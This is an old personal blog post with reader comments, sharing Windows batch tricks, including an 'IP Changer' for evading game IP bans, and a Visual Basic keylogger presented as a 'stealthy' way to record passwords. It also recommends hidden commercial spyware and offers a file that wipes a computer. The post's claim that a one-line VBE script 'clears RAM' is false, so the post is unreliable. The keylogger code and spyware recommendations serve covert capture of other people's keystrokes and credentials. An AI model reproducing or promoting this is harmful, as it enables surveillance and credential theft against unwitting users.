Tuesday, September 14, 2010

Making an IP Changer, Keylogger and more.

According to the poll votes, you guys want to hear more about 'Computer Related' tips so here you go (Yes I actually determine my posts via the polls so vote on it on the right hand side!)

Im sure most of you have the problem that you need to refresh your IP because your just plugging in and out new cables or the wireless is a bit faulty, or maybe you just got an IP ban from an online game? I will teach you how to make a quick IP Changer in 10 seconds. Oh and some other useful programs!

Step 1: Open Notepad
Step 2: Copy the below codes into it
------------------------------------------------------
ipconfig /release
ipconfig /flushdns
ipconfig /renew
------------------------------------------------------
Step 3: Save As "IPChanger.bat" (The .bat at the end is important)
Step 4: Test it out and open it

The IP Changer does not work for some popular online games which use third party programs such as punkbuster or steam since they pretty much know more about your computer than you do.

With this method of making programs in .bat files, I have some more interesting programs for you to make and try, except one.

Make your computer sleep, and to turn on instantly just press a button on the keyboard.
Very useful I use it as i don't have time to wait for the computer to startup =)
------------------------------------------------------
RUNDLL32.EXE PowrProf.dll,SetSuspendState
------------------------------------------------------

Shutdown Computer
------------------------------------------------------
shutdown -f -s
------------------------------------------------------

This one makes your computer faster by clearing RAM.
(MUST SAVE AS .VBE not .BAT
------------------------------------------------------
mystring=(80000000)
------------------------------------------------------

Now for the fun part. The Keylogger which is a stealthy little program that records anything you type including passwords. I am currently studying programming at university and on the side am working on a keylogger program, I have only figured out the fundamentals of it so this is only a prototype. This is not a .bat or .vbe file. First you will need Visual Studio 2008 to create this program, anything above and below like VB2010 will not work.
------------------------------------------------------
//LSurge.blogspot.com(c)
Public Class Form1
    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For i = 1 To 255
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                TextBox1.Text = TextBox1.Text + Chr(i)
            End If
        Next i
    End Sub
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Timer1.Start()
    End Sub
End Class
------------------------------------------------------
Since this is a prototype and needs working on it I suggest downloading a keylogger to use. I know that all you guys searching for one 90% of the time run into virus'. So im going to recommend ActualSpy which is a very portable keylogger to use and uninstall. Or Elitekeylogger which is permanent, hidden but uninstallable. It intergrates itself into the registry keys of a computer.

Now I do have a bat file that deletes the users computer but I am unwilling to put it up as it may cause some problems for you guys if you accidentally open it. So let me know if you would like to see it or not.

17 comments:

  1. Dude, this is beast!

    Thanks so much

    ReplyDelete
  2. Nice , now i know how to hack the interwebs like a pro

    ReplyDelete
  3. cool site, b ro. i think ill follow AND STUFF!

    ReplyDelete
  4. Thanks guys!
    Nissen vote on my poll so then I know what you want =)
    and Pandas ICWATUDIDTERE inb4returnfavor

    ReplyDelete
  5. great blog!!! You should check out mine :)

    http://biffburger.blogspot.com/

    ReplyDelete
  6. Great info I like your site.
    Help support your local blogs.

    ReplyDelete
  7. like this, I have saved almost all of your blogs so far:)

    ReplyDelete
  8. Thanks it takes me a while to type it up! Lucky all the research is pre-made in my head =)

    ReplyDelete
  9. I seriously love your posts. Computersciencemajorfag here, and all of this is very relevant to my interests.

    ReplyDelete